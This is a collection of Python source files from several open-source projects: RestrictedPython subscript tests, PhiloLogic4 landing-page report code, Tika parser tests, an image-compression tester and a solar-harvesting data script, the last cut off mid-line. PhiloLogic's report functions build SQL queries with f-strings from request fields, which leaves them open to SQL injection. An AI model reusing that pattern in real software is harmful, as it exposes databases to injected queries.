_getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(TUPLE_SUBSCRIPTS, glb)\n\n assert (value, (1, 2)) == glb['tuple_subscript'](value)\n\n\nSLICE_SUBSCRIPT_NO_UPPER_BOUND = \"\"\"\ndef slice_subscript_no_upper_bound(a):\n return a[1:]\n\"\"\"\n\n\ndef test_read_slice_subscript_no_upper_bound(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SLICE_SUBSCRIPT_NO_UPPER_BOUND, glb)\n\n assert (value, slice(1, None, None)) == glb['slice_subscript_no_upper_bound'](value) # NOQA: E501\n\n\nSLICE_SUBSCRIPT_NO_LOWER_BOUND = \"\"\"\ndef slice_subscript_no_lower_bound(a):\n return a[:1]\n\"\"\"\n\n\ndef test_read_slice_subscript_no_lower_bound(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SLICE_SUBSCRIPT_NO_LOWER_BOUND, glb)\n\n assert (value, slice(None, 1, None)) == glb['slice_subscript_no_lower_bound'](value) # NOQA: E501\n\n\nSLICE_SUBSCRIPT_NO_STEP = \"\"\"\ndef slice_subscript_no_step(a):\n return a[1:2]\n\"\"\"\n\n\ndef test_read_slice_subscript_no_step(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SLICE_SUBSCRIPT_NO_STEP, glb)\n\n assert (value, slice(1, 2, None)) == glb['slice_subscript_no_step'](value)\n\n\nSLICE_SUBSCRIPT_WITH_STEP = \"\"\"\ndef slice_subscript_with_step(a):\n return a[1:2:3]\n\"\"\"\n\n\ndef test_read_slice_subscript_with_step(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(SLICE_SUBSCRIPT_WITH_STEP, glb)\n\n assert (value, slice(1, 2, 3)) == glb['slice_subscript_with_step'](value)\n\n\nEXTENDED_SLICE_SUBSCRIPT = \"\"\"\n\ndef extended_slice_subscript(a):\n return a[0, :1, 1:, 1:2, 1:2:3]\n\"\"\"\n\n\ndef test_read_extended_slice_subscript(mocker):\n value = None\n _getitem_ = mocker.stub()\n _getitem_.side_effect = lambda ob, index: (ob, index)\n glb = {'_getitem_': _getitem_}\n restricted_exec(EXTENDED_SLICE_SUBSCRIPT, glb)\n ret = glb['extended_slice_subscript'](value)\n ref = (\n value,\n (\n 0,\n slice(None, 1, None),\n slice(1, None, None),\n slice(1, 2, None),\n slice(1, 2, 3)\n )\n )\n\n assert ref == ret\n\n\nWRITE_SUBSCRIPTS = \"\"\"\ndef assign_subscript(a):\n a['b'] = 1\n\"\"\"\n\n\ndef test_write_subscripts(\n mocker):\n value = {'b': None}\n _write_ = mocker.stub()\n _write_.side_effect = lambda ob: ob\n glb = {'_write_': _write_}\n restricted_exec(WRITE_SUBSCRIPTS, glb)\n\n glb['assign_subscript'](value)\n assert value['b'] == 1\n\n\nDEL_SUBSCRIPT = \"\"\"\ndef del_subscript(a):\n del a['b']\n\"\"\"\n\n\ndef test_del_subscripts(\n mocker):\n value = {'b': None}\n _write_ = mocker.stub()\n _write_.side_effect = lambda ob: ob\n glb = {'_write_': _write_}\n restricted_exec(DEL_SUBSCRIPT, glb)\n glb['del_subscript'](value)\n\n assert value == {}\n","repo_name":"zopefoundation/RestrictedPython","sub_path":"tests/transformer/test_subscript.py","file_name":"test_subscript.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","stars":363,"dataset":"github-code","pt":"61"} +{"seq_id":"74064388035","text":"#!/usr/bin/env python3\n\"\"\"Landing page reports.\"\"\"\n\nimport sqlite3\nimport sys\n\nimport orjson\nfrom philologic.runtime.DB import DB\nfrom unidecode import unidecode\n\n\ndef landing_page_bibliography(request, config):\n \"\"\"Retrieves volumes for dictionary view\"\"\"\n db = DB(config.db_path + \"/data/\")\n object_level = request.object_level\n if object_level and object_level in [\"doc\", \"div1\", \"div2\", \"div3\"]:\n hits = db.get_all(object_level)\n else:\n hits = db.get_all(db.locals[\"default_object_level\"])\n results = []\n c = db.dbh.cursor()\n for hit in hits:\n hit_object = {}\n for field in db.locals[\"metadata_fields\"]:\n hit_object[field] = hit[field] or \"\"\n if object_level == \"doc\":\n hit_object[\"philo_id\"] = hit.philo_id[0]\n else:\n hit_object[\"philo_id\"] = \"/\".join([str(i) for i in hit.philo_id])\n doc_id = f\"{hit.philo_id[0]} 0 0 0 0 0 0\"\n next_doc_id = f\"{hit.philo_id[0] + 1} 0 0 0 0 0 0\"\n c.execute(f'select rowid from toms where philo_id=\"{doc_id}\"')\n doc_row = c.fetchone()[\"rowid\"]\n c.execute(f'select rowid from toms where philo_id=\"{next_doc_id}\"')\n try:\n next_doc_row = c.fetchone()[\"rowid\"]\n except TypeError: # if this is the last doc, just get the last rowid in the table.\n c.execute(\"select max(rowid) from toms;\")\n next_doc_row = c.fetchone()[0]\n try:\n c.execute(\n f'select * from toms where rowid between {doc_row} and {next_doc_row} and head is not null and head !=\"\" limit 1'\n )\n except sqlite3.OperationalError: # no type field in DB\n c.execute(\n 'select * from toms where rowid between ? and ? and head is not null and head !=\"\" limit 1',\n (doc_row, next_doc_row),\n )\n try:\n start_head = c.fetchone()[\"head\"]\n start_head = start_head.lower().title()\n except Exception as e:\n print(repr(e), file=sys.stderr)\n start_head = \"\"\n try:\n c.execute(\n f'select head from toms where rowid between {doc_row} and {next_doc_row} and head is not null and head !=\"\" order by rowid desc limit 1'\n )\n except sqlite3.OperationalError: # no type field in DB\n c.execute(\n f'select head from toms where rowid between {doc_row} and {next_doc_row} and head is not null and head !=\"\" order by rowid desc limit 1'\n )\n try:\n end_head = c.fetchone()[\"head\"]\n end_head = end_head.lower().title()\n except:\n end_head = \"\"\n hit_object[\"start_head\"] = start_head\n hit_object[\"end_head\"] = end_head\n\n results.append(hit_object)\n return orjson.dumps(results)\n\n\ndef group_by_range(request_range, request, config):\n \"\"\"Group metadata by range\"\"\"\n db = DB(config.db_path + \"/data/\")\n metadata_queried = request.group_by_field\n is_date = False\n try:\n int(request_range[0])\n int(request_range[1])\n is_date = True\n except ValueError:\n pass\n\n metadata_fields_needed, citations = get_fields_and_citations(request, config)\n cursor = db.dbh.cursor()\n content = {}\n if is_date:\n content_type = \"date\"\n query = f'select * from toms where philo_type=\"doc\" and {metadata_queried} between ? and ?'\n cursor.execute(query, (int(request_range[0]), int(request_range[1])))\n content = {}\n for doc in cursor:\n metadata = {m: doc[m] for m in metadata_fields_needed}\n if str(metadata[metadata_queried]) not in content:\n content[f\"{metadata[metadata_queried]}\"] = {\"prefix\": metadata[metadata_queried], \"results\": []}\n content[f\"{metadata[metadata_queried]}\"][\"results\"].append(\n {\n \"metadata\": metadata,\n \"count\": 1,\n }\n )\n return orjson.dumps(\n {\n \"display_count\": request.display_count,\n \"content_type\": content_type,\n \"content\": content,\n \"citations\": citations,\n }\n )\n content_type = metadata_queried\n query_range = set(range(ord(request_range[0]), ord(request_range[1]) + 1)) # Ordinal avoids unicode issues...\n try:\n cursor.execute(f'select *, count(*) as count from toms where philo_type=\"doc\" group by {metadata_queried}')\n except sqlite3.OperationalError:\n return orjson.dumps({\"display_count\": request.display_count, \"content_type\": content_type, \"content\": []})\n for doc in cursor:\n normalized_test_value = \"\"\n if doc[metadata_queried] is None:\n continue\n try:\n initial_letter = doc[metadata_queried][0].lower()\n except IndexError:\n # we have an empty string\n continue\n try:\n test_value = ord(initial_letter)\n normalized_test_value = ord(unidecode(initial_letter))\n except TypeError:\n continue\n initial = initial_letter.upper()\n # Are we within the range?\n if test_value in query_range or normalized_test_value in query_range:\n if normalized_test_value in query_range:\n initial = unidecode(initial_letter).upper()\n metadata = {m: doc[m] for m in metadata_fields_needed}\n if initial not in content:\n content[initial] = {\"prefix\": initial, \"results\": []}\n content[initial][\"results\"].append(\n {\n \"metadata\": metadata,\n \"count\": doc[\"count\"],\n }\n )\n return orjson.dumps(\n {\n \"display_count\": request.display_count,\n \"content_type\": content_type,\n \"content\": content,\n \"citations\": citations,\n }\n )\n\n\ndef group_by_metadata(request, config):\n \"\"\"Count result by metadata field\"\"\"\n db = DB(config.db_path + \"/data/\")\n metadata_fields_needed, citations = get_fields_and_citations(request, config)\n cursor = db.dbh.cursor()\n query = f\"\"\"select * from toms where philo_type=\"doc\" and {request.group_by_field}=?\"\"\"\n cursor.execute(query, (request.query,))\n result_group = []\n for doc in cursor:\n metadata = {}\n for m in metadata_fields_needed:\n try:\n metadata[m] = doc[m]\n except IndexError:\n pass\n result_group.append(\n {\n \"metadata\": metadata,\n }\n )\n return orjson.dumps(\n {\n \"display_count\": request.display_count,\n \"content_type\": request.group_by_field,\n \"content\": [{\"prefix\": request.query, \"results\": result_group}],\n \"citations\": citations,\n }\n )\n\n\ndef get_fields_and_citations(request, config):\n \"\"\"Get fields and citations\"\"\"\n metadata_fields_needed = [request.group_by_field, \"philo_id\"]\n citations = []\n for conf in config.default_landing_page_browsing:\n if conf[\"group_by_field\"] == request.group_by_field:\n for citation in conf[\"citation\"]:\n citations.append(citation)\n metadata_fields_needed.append(citation[\"field\"])\n break\n return metadata_fields_needed, citations\n","repo_name":"ARTFL-Project/PhiloLogic4","sub_path":"python/philologic/runtime/reports/landing_page.py","file_name":"landing_page.py","file_ext":"py","file_size_in_byte":7425,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"61"} +{"seq_id":"24562111826","text":"from blabel import LabelWriter\nimport datetime\n\ndef createLabel(content):\n vorname = content[0]\n nachname = content[1]\n date = content[2].strftime(\"%d.%m.%Y\")\n geburtsdatum = datetime.datetime.strptime(content[3], '%Y-%m-%d').strftime(\"%d.%m.%Y\")\n adresse = content[4]\n ort = content[5]\n token = content[6]\n telefon = content[7]\n label_writer = LabelWriter(\"../utils/Labels/template.html\", default_stylesheets=(\"../utils/Labels/style.css\",))\n filename = \"../../Labels/\" + str(token) + \".pdf\"\n records = [\n dict(Vorname=vorname, Nachname=nachname, Adresse=adresse, Wohnort=ort, Geburtsdatum=geburtsdatum, Date=date, Telefon=telefon),\n ]\n label_writer.write_labels(records, target=filename)\n return filename","repo_name":"DRK-Odenwaldkreis/Testerfassung","sub_path":"LabelCreationJob/createLabel.py","file_name":"createLabel.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74596920515","text":"import os\nimport time\n\nimport cv2\nimport torch\nfrom dataset.testDataset import ImageFolderUnited\nfrom dataset.utils import *\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom utils.IOutils import *\nfrom utils.metrics import AverageMeter, compute_metrics\n\nfrom .tester_single import TesterSingle\n\n\nclass TesterUnited(TesterSingle):\n def __init__(self, args, model_config) -> None:\n super().__init__(args, model_config)\n\n def init_dataset(self, test_dataset, test_batch_size, num_workers, channel):\n test_transforms = transforms.Compose([transforms.ToTensor()])\n test_dataset = ImageFolderUnited(test_dataset, transform=test_transforms, debug=self.debug)\n test_dataloader = DataLoader(test_dataset, batch_size=test_batch_size, num_workers=num_workers, shuffle=False)\n return test_dataloader\n\n def getAvgMeter(self):\n return {\n \"avg_rgb_psnr\": AverageMeter(),\n \"avg_rgb_ms_ssim\": AverageMeter(),\n \"avg_rgb_bpp\": AverageMeter(),\n \"avg_depth_psnr\": AverageMeter(),\n \"avg_depth_ms_ssim\": AverageMeter(),\n \"avg_depth_bpp\": AverageMeter(),\n \"avg_deocde_time\": AverageMeter(),\n \"avg_encode_time\": AverageMeter(),\n }\n\n def updateAvgMeter(self, avgMeter, rgb_p, rgb_m, rgb_bpp, depth_p, depth_m, depth_bpp, dec_time, enc_time):\n avgMeter[\"avg_rgb_psnr\"].update(rgb_p)\n avgMeter[\"avg_rgb_ms_ssim\"].update(rgb_m)\n avgMeter[\"avg_rgb_bpp\"].update(rgb_bpp)\n avgMeter[\"avg_depth_psnr\"].update(depth_p)\n avgMeter[\"avg_depth_ms_ssim\"].update(depth_m)\n avgMeter[\"avg_depth_bpp\"].update(depth_bpp)\n avgMeter[\"avg_deocde_time\"].update(dec_time)\n avgMeter[\"avg_encode_time\"].update(enc_time)\n\n @torch.no_grad()\n def test_model(self, padding_mode=\"reflect0\", padding=True):\n self.net.eval()\n avgMeter = self.getAvgMeter()\n rec_dir = self.get_rec_dir(padding=padding, padding_mode=padding_mode)\n\n for i, (rgb, depth, rgb_img_name, depth_img_name) in enumerate(self.test_dataloader):\n B, C, H, W = rgb.shape\n\n rgb = rgb.to(self.device)\n depth = depth.to(self.device)\n\n rgb_pad = pad(rgb, padding_mode)\n depth_pad = pad(depth, padding_mode)\n rgb_stream_path = os.path.join(rec_dir, \"depth_bin\")\n depth_stream_path = os.path.join(rec_dir, \"rgb_bin\")\n rgb_bpp, depth_bpp, enc_time = self.compress_one_image_united(\n x=(rgb_pad, depth_pad),\n stream_path=(rgb_stream_path, depth_stream_path),\n H=H,\n W=W,\n img_name=rgb_img_name[0],\n )\n rgb_x_hat, depth_x_hat, dec_time = self.decompress_one_image_united(\n stream_path=(rgb_stream_path, depth_stream_path), img_name=rgb_img_name[0], mode=padding_mode\n )\n self.test_save_and_log_perimg(\n i,\n rgb_x_hat,\n depth_x_hat,\n rgb,\n depth,\n rec_dir,\n rgb_img_name,\n avgMeter,\n rgb_bpp,\n depth_bpp,\n dec_time,\n enc_time,\n )\n self.test_finish_log(avgMeter, rec_dir)\n\n def test_save_and_log_perimg(\n self, i, rgb_x_hat, depth_x_hat, rgb, depth, rec_dir, img_name, avgMeter, rgb_bpp, depth_bpp, dec_time, enc_time\n ):\n rgb_p, rgb_m = compute_metrics(rgb_x_hat, rgb)\n depth_p, depth_m = compute_metrics(depth_x_hat, depth)\n\n saveImg(rgb_x_hat, os.path.join(rec_dir, \"rgb_rec\", f\"{img_name[0]}_rec.png\"))\n saveImg(depth_x_hat, os.path.join(rec_dir, \"depth_rec\", f\"{img_name[0]}_rec_8bit.png\"))\n\n if rec_dir.find(\"sun\") != -1:\n depth = depth_x_hat * 100000\n else:\n depth = depth_x_hat * 10000\n depth = depth.cpu().squeeze().numpy().astype(\"uint16\")\n cv2.imwrite(os.path.join(self.save_dir, \"depth_rec\", f\"{img_name[0]}_rec_16bit.png\"), depth)\n\n self.updateAvgMeter(avgMeter, rgb_p, rgb_m, rgb_bpp, depth_p, depth_m, depth_bpp, dec_time, enc_time)\n self.logger_test.info(\n f\"Image[{i}] | \"\n f\"rBpp loss: {rgb_bpp:.4f} | \"\n f\"dBpp loss: {depth_bpp:.4f} | \"\n f\"rPSNR: {rgb_p:.4f} | \"\n f\"dPSNR: {depth_p:.4f} | \"\n f\"rMS-SSIM: {rgb_m:.4f} | \"\n f\"sMS-SSIM: {depth_m:.4f} | \"\n f\"Encoding Latency: {enc_time:.4f} | \"\n f\"Decoding latency: {dec_time:.4f}\"\n )\n\n def test_finish_log(self, avgMeter, rec_dir):\n self.logger_test.info(\n f\"Epoch:[{self.epoch}] | \"\n f\"Avg Bpp: {avgMeter['avg_rgb_bpp'].avg:.7f} | \"\n f\"Avg Bpp: {avgMeter['avg_depth_bpp'].avg:.7f} | \"\n f\"Avg PSNR: {avgMeter['avg_rgb_psnr'].avg:.7f} | \"\n f\"Avg PSNR: {avgMeter['avg_depth_psnr'].avg:.7f} | \"\n f\"Avg MS-SSIM: {avgMeter['avg_rgb_ms_ssim'].avg:.7f} | \"\n f\"Avg MS-SSIM: {avgMeter['avg_depth_ms_ssim'].avg:.7f} | \"\n f\"Avg Encoding Latency: {avgMeter['avg_encode_time'].avg:.6f} | \"\n f\"Avg Decoding latency: {avgMeter['avg_deocde_time'].avg:.6f}\"\n )\n\n self.write_test_img_name(os.path.join(rec_dir, \"depth_rec\"), os.path.join(rec_dir, \"test_depth.txt\"))\n self.write_test_img_name(os.path.join(rec_dir, \"rgb_rec\"), os.path.join(rec_dir, \"test_rgb.txt\"))\n\n def compress_one_image_united(self, x, stream_path, H, W, img_name):\n torch.cuda.synchronize()\n start_time = time.time()\n with torch.no_grad():\n out = self.net.compress(x[0], x[1])\n torch.cuda.synchronize()\n end_time = time.time()\n shape = out[\"shape\"]\n os.makedirs(stream_path[0], exist_ok=True)\n os.makedirs(stream_path[1], exist_ok=True)\n\n rgb_output = os.path.join(stream_path[0], img_name)\n with Path(rgb_output).open(\"wb\") as f:\n write_uints(f, (H, W))\n write_body(f, shape, out[\"r_strings\"])\n size = filesize(rgb_output)\n rgb_bpp = float(size) * 8 / (H * W)\n\n depth_output = os.path.join(stream_path[1], img_name)\n with Path(depth_output).open(\"wb\") as f:\n write_uints(f, (H, W))\n write_body(f, shape, out[\"d_strings\"])\n size = filesize(depth_output)\n depth_bpp = float(size) * 8 / (H * W)\n\n enc_time = end_time - start_time\n return rgb_bpp, depth_bpp, enc_time\n\n def decompress_one_image_united(self, stream_path, img_name, mode=\"reflect0\"):\n rgb_output = os.path.join(stream_path[0], img_name)\n with Path(rgb_output).open(\"rb\") as f:\n original_size = read_uints(f, 2)\n rgb_strings, shape = read_body(f)\n\n depth_output = os.path.join(stream_path[1], img_name)\n with Path(depth_output).open(\"rb\") as f:\n original_size = read_uints(f, 2)\n depth_strings, shape = read_body(f)\n\n torch.cuda.synchronize()\n start_time = time.time()\n with torch.no_grad():\n out = self.net.decompress(rgb_strings, depth_strings, shape)\n torch.cuda.synchronize()\n end_time = time.time()\n dec_time = end_time - start_time\n rgb_x_hat = out[\"x_hat\"][\"r\"]\n depth_x_hat = out[\"x_hat\"][\"d\"]\n if mode.find(\"0\") != -1:\n rgb_x_hat = crop0(rgb_x_hat, original_size)\n depth_x_hat = crop0(depth_x_hat, original_size)\n else:\n rgb_x_hat = crop1(rgb_x_hat, original_size)\n depth_x_hat = crop1(depth_x_hat, original_size)\n return rgb_x_hat, depth_x_hat, dec_time\n","repo_name":"xyy7/ELIC-rgbd","sub_path":"testing/tester_united.py","file_name":"tester_united.py","file_ext":"py","file_size_in_byte":7765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40421520624","text":"import sys\nimport unittest\nif sys.version_info >= (3, 3):\n from unittest import mock\nelse:\n import mock\nimport tika.parser\n\n\nclass CreateTest(unittest.TestCase):\n 'test different services in from_file parsing: Content, Metadata or both in recursive mode'\n\n def test_default_service(self):\n 'parse file using default service'\n result = tika.parser.from_file(\n 'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf')\n self.assertEqual(result['metadata']['Content-Type'],'application/pdf')\n self.assertIn('AUTORIDADES Y PERSONAL',result['content'])\n @mock.patch('tika.parser._parse')\n @mock.patch('tika.parser.parse1')\n def test_remote_endpoint(self, tika_call_mock, _):\n result = tika.parser.from_file(\n 'filename', 'http://tika:9998/tika')\n\n tika_call_mock.assert_called_with(\n 'all', 'filename', 'http://tika:9998/tika', headers=None, config_path=None,\n requestOptions={})\n def test_default_service_explicit(self):\n 'parse file using default service explicitly'\n result = tika.parser.from_file(\n 'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf', service='all')\n self.assertEqual(result['metadata']['Content-Type'],'application/pdf')\n self.assertIn('AUTORIDADES Y PERSONAL',result['content'])\n def test_text_service(self):\n 'parse file using the content only service'\n result = tika.parser.from_file(\n 'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf', service='text')\n self.assertIsNone(result['metadata'])\n self.assertIn('AUTORIDADES Y PERSONAL',result['content'])\n def test_meta_service(self):\n 'parse file using the content only service'\n result = tika.parser.from_file(\n 'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf', service='meta')\n self.assertIsNone(result['content'])\n self.assertEqual(result['metadata']['Content-Type'],'application/pdf')\n def test_invalid_service(self):\n 'parse file using an invalid service should perform the default parsing'\n result = tika.parser.from_file(\n 'https://boe.es/boe/dias/2019/12/02/pdfs/BOE-A-2019-17288.pdf', service='bad')\n self.assertEqual(result['metadata']['Content-Type'],'application/pdf')\n self.assertIn('AUTORIDADES Y PERSONAL',result['content'])\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"chrismattmann/tika-python","sub_path":"tika/tests/test_from_file_service.py","file_name":"test_from_file_service.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":1359,"dataset":"github-code","pt":"61"} +{"seq_id":"35947388814","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 14 17:32:18 2021\n\n@author: Enrique\n\"\"\"\n\n''' Functions to sample bipartite graphs with prescribed\ndegree sequences, using the sequential algorithm. '''\n\nimport numpy as np\nfrom .sequential_algo_binary import seq_algo_binary\n\ndef bipartite_graph_matrix(m, n):\n ''' \n \n Construct the linear constraint matrix for the \n bipartite graph problem.\n \n Parameters\n ----------\n m: number of rows (nodes of first set)\n n: number of columns (nodes of second set)\n \n Returns\n -------\n A: matrix of size (m+n)x(mn) \n \n '''\n A = np.zeros([m + n, m*n], dtype=int)\n A[:m,:] = np.kron(np.eye(m), np.ones(n))\n A[m:,:] = np.kron(np.ones(m), np.eye(n))\n return A\n\ndef bipartite_graph_to_binary_instance(r, c):\n ''' \n \n Compute the affine mapping of the bipartite graph instance.\n \n Parameters\n ----------\n r: row degrees (nodes of first set)\n c: column degrees (nodes of second set)\n \n Returns\n -------\n A: matrix of linear mapping\n b: rhs vector of linear mapping\n \n '''\n m = len(r)\n n = len(c)\n A = bipartite_graph_matrix(m, n)\n b = np.concatenate((r, c))\n return A, b\n\ndef sample_bipartite_graph(r, c, rule='fixed', dual_method='cvxpy'):\n ''' \n \n Simulate a random bipartite graph x which satisfies the given\n degree sequences using the sequential maximum entropy algorithm.\n \n Parameters\n ----------\n r: row degrees (nodes of first set), length m\n c: column degrees (nodes of second set), length n\n rule: string, edge selection rule\n dual_method: string, method for solving the dual of the maximum entropy problem\n \n Returns\n -------\n x: edge indicator vector of size mxn (1 if edge is present)\n p: numeric, estimator of p_x, where p_x is the probability of observing x\n w: numeric, estimator of 1/p_x\n \n '''\n \n # check feasibility\n # TODO: implement Gale Ryser or some other criterion\n # I don't see it in NetworkX\n \n # create linear mapping\n (A, b) = bipartite_graph_to_binary_instance(r, c)\n \n # call binary sequential algo\n x, p, w = seq_algo_binary(A, b, rule=rule, dual_method=dual_method)\n return x, p, w\n\ndef vector_to_matrix(x, m, n):\n ''' \n \n Transform a vector in long form into the original mxn matrix.\n \n Parameters\n ----------\n x: mxn vector\n m: number of rows\n n: number of columns\n \n Returns\n -------\n X: mxn matrix with the elements of x \n \n '''\n if len(x) != m*n:\n raise ValueError('length of x is not equal to m*n')\n X = np.reshape(x, (m,n))\n return X\n","repo_name":"enrique-lelodelarrea/entropy-graph-simulation","sub_path":"graphsim/bipartite_graphs.py","file_name":"bipartite_graphs.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15128685266","text":"import logging\nimport os\nimport queue\nimport threading\nimport datetime\n\nimport h5py\nimport numpy as np\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\", module='pvlib')\nwarnings.filterwarnings(\"ignore\", module='pysolar')\n\nfrom iv_curves_definitions import HarvestingCondition\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nconsole_log_handler = logging.StreamHandler()\nconsole_log_formatter = logging.Formatter('%(levelname)s - %(message)s')\nconsole_log_handler.setFormatter(console_log_formatter)\nlogger.addHandler(console_log_handler)\n\n\ndef create_conditions(path, thermometer_temperature, solar_cell_model, address=\"Kuglerstraße, Essen,45144\",\n latitude=51.455643, longitude=7.011555, start_time=datetime.datetime.now(),\n end_time=datetime.datetime.now() + datetime.timedelta(seconds=30)):\n import requests\n import urllib\n from dateutil import tz\n import time\n import datetime\n\n import sys\n\n date = str(start_time.strftime(\"%d.%m.%Y\"))\n start_time = str(start_time.strftime(\"%H:%M:%S.%f\"))\n end_time = str(end_time.strftime(\"%H:%M:%S.%f\"))\n\n try:\n if address != \"Kuglerstraße, Essen,45144\":\n url = 'https://nominatim.openstreetmap.org/search/' + urllib.parse.quote(address) + '?format=json'\n response = requests.get(url).json()\n latitude = round(float(response[0][\"lat\"]), 7)\n longitude = round(float(response[0][\"lon\"]), 7)\n except:\n print(\n \"An error occurred while connecting to the openstreetmap.org. Please check your connection and try again.\")\n sys.exit()\n\n from timezonefinder import TimezoneFinder\n tf = TimezoneFinder()\n timezone = tf.timezone_at(lng=longitude, lat=latitude)\n\n def create_prognoes_conditions():\n dict_temp = {\"start_time\": str(\n datetime.datetime.strptime(date + ' ' + start_time, \"%d.%m.%Y %H:%M:%S.%f\").timestamp()),\n \"end_time\": str(\n datetime.datetime.strptime(date + ' ' + end_time, \"%d.%m.%Y %H:%M:%S.%f\").timestamp()),\n \"thermometer_temperature\": thermometer_temperature, \"address\": address,\n \"latitude\": str(latitude), \"longitude\": str(longitude),\n \"solar_cell\": solar_cell_model}\n\n f = h5py.File(path, 'a')\n dt = h5py.string_dtype(encoding='utf-8')\n dsetx = f.create_dataset(\"prognoes_conditions\", (2, 7), dtype=dt)\n dsetx[0] = list(dict_temp.keys())\n dsetx[1] = list(dict_temp.values())\n\n def create_weather_conditions():\n def get_nearest_station_mowesta_forecast_current_hour():\n import sys\n import os\n sys.path.append(os.path.abspath('../'))\n from mowesta import mowesta_day_minute\n\n result = {\"timestamp\": str(time.time()), \"temperature\": \"Not Available\", \"total_clouds\": \"Not Available\",\n \"precipitation\": \"Not Available\", \"snowDepth\": \"Not Available\", \"windSpeed\": \"Not Available\",\n \"humidity\": \"Not Available\", \"pressure\": \"Not Available\", \"pysolar_cs_ghi\": \"Not Available\",\n \"IandP_cs_ghi\": \"Not Available\", \"cs_ghi\": \"Not Available\",\n \"cs_dni\": \"Not Available\", \"cs_dhi\": \"Not Available\", \"cn_ghi\": \"Not Available\",\n \"cn_dni\": \"Not Available\", \"cn_dhi\": \"Not Available\"\n }\n\n result_day, result_minute, result_minute_dict = mowesta_day_minute(address=address,\n date=datetime.datetime.now())\n\n if not result_minute.empty:\n dict_temp = result_minute.to_dict()\n dict_temp['timestamp'] = {0: str(datetime.datetime.utcnow().timestamp())}\n\n for key, value in dict_temp.items():\n for keys, values in value.items():\n result.update({key: str(values)})\n return result\n\n dict_temp = get_nearest_station_mowesta_forecast_current_hour()\n f = h5py.File(path, 'a')\n dt = h5py.string_dtype(encoding='utf-8')\n dsetx = f.create_dataset(\"weather_conditions\", (2, 16), dtype=dt)\n dsetx[0] = list(dict_temp.keys())\n dsetx[1] = list(dict_temp.values())\n\n def create_weather_irradiation_conditions():\n import sys\n import os\n sys.path.append(os.path.abspath('../'))\n from pvlib_functions import GFS_day_minute\n result = {'timestamp': str(time.time()), 'temp_air': \"Not Available\", 'wind_speed': \"Not Available\",\n 'total_clouds': \"Not Available\",\n 'low_clouds': \"Not Available\", 'mid_clouds': \"Not Available\",\n 'high_clouds': \"Not Available\", 'GFS_ghi': \"Not Available\", 'cs_ghi': \"Not Available\",\n 'cs_dni': \"Not Available\",\n 'cs_dhi': \"Not Available\", 'cn_ghi': \"Not Available\",\n 'cn_dni': \"Not Available\", 'cn_dhi': \"Not Available\"}\n\n date = datetime.datetime.now()\n result_day, result_minute, result_minute_dict = GFS_day_minute(address, timezone, date)\n\n if not result_minute.empty:\n dict_temp = result_minute.to_dict()\n dict_temp['timestamp'] = {0: str(datetime.datetime.now(tz=tz.gettz(timezone)))}\n\n for key, value in dict_temp.items():\n for keys, values in value.items():\n result.update({key: str(values)})\n import h5py\n f = h5py.File(path, 'a')\n dt = h5py.string_dtype(encoding='utf-8')\n dsetx = f.create_dataset(\"irradiation_weather_conditions\", (2, 14), dtype=dt)\n dsetx[0] = list(result.keys())\n dsetx[1] = list(result.values())\n\n return result_day, result_minute\n\n create_prognoes_conditions()\n create_weather_conditions()\n create_weather_irradiation_conditions()\n return True\n\n\ndef generate_filename(_file_name) -> str:\n if _file_name == 'AUTO-GENERATE':\n for files in os.walk('data'):\n number_of_files_in_directory = len(files[2])\n if number_of_files_in_directory == 0:\n return 'trace_0.hdf5'\n # TODO Is this too hacky?\n list_of_file_names = files[2]\n highest_file_index = 0\n for file_name_without_extension in list_of_file_names:\n file_name_without_extension = file_name_without_extension.split('.')\n index_of_trace_file = file_name_without_extension[0].split('_')\n if int(index_of_trace_file[1]) > highest_file_index:\n highest_file_index = int(index_of_trace_file[1])\n new_filename = 'trace_' + str(highest_file_index + 1) + '.hdf5'\n # TODO Add more error handling for the files already present in the directory\n return new_filename\n else:\n return _file_name\n\n\ndef write_iv_curves_to_disk(_iv_curves_queue: queue.Queue, _file_name, address, temperature, solar_cell_model,\n _harvesting_condition: HarvestingCondition,\n _stop_thread_event: threading.Event):\n curve_counter = 0\n data_array_buffer = []\n\n new_filename = '../data/SOCRAETES/' + generate_filename(_file_name)\n # new_filename = 'data/' + str(datetime.datetime.now().strftime(\"%m-%d-%Y--%H-%M-%S\")) + \".hdf5\"\n\n start_time = datetime.datetime.now()\n start_time_string = str(start_time.hour) + ':' + str(start_time.minute) + ':' + str(start_time.second) + '.' + \\\n str(start_time.microsecond)\n start_date_string = str(start_time.day) + '.' + str(start_time.month) + '.' + str(start_time.year)\n\n while True:\n if _stop_thread_event.isSet():\n end_time = 